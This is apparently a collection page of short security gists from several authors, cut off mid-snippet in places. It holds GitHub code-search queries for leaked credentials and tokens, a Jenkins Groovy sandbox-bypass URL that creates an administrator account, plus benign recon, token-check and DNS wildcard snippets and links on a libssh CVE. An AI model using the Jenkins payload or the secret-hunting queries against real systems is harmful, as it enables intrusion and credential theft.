dwisiswant0

#!/bin/bash

#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor

nullenc0de

https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

akhil-reni

http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}

sminez

#!/usr/bin/env python3
"""
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
"""
import re
import sys

EdOverflow

$ curl -s "https://crawler.ninja/files/security-txt-values.txt" | grep -i "hiring: http" | sed 's/^#//g' | awk '{print $2}'
https://www.tumblr.com/jobs
https://kariera.shoptet.cz/
https://g.co/SecurityPrivacyEngJobs
https://www.shopify.com/careers
https://solarwinds.jobs
https://www.chcidozootu.cz/it-devel/
https://careerssearch.bbc.co.uk/jobs/search
https://www.npmjs.com/jobs
https://grab.careers/

nullenc0de

/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0

EdOverflow

#!/bin/bash

GREEN='\033[0;32m'
RED='\033[0;31m'
END='\033[0m'

request=$(curl -s -u "hehe:$1" https://api.github.com/user)
name=$(echo "$request" | jq -r ".login" 2> /dev/null)
if [[ $name == "null" ]]; then
	echo -e "${RED}Not a GitHub access token.${END}"

akhil-reni

003random

if [[ "$(dig @1.1.1.1 A,CNAME {test321123,testingforwildcard,plsdontgimmearesult}.$domain +short | wc -l)" -gt "1" ]]; then
    echo "[!] Possible wildcard detected."
fi

0x4D31

Libssh authentication bypass vulnerability (CVE-2018-10933)

An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug.

• CVE-2018-10933 Advisory
• Exploit - Patched Libssh Client
• CVE-2018-10933-test
• libSSH-Authentication-Bypass
• HASSH - an SSH client/server profiling method
• ssh-hassh nmap script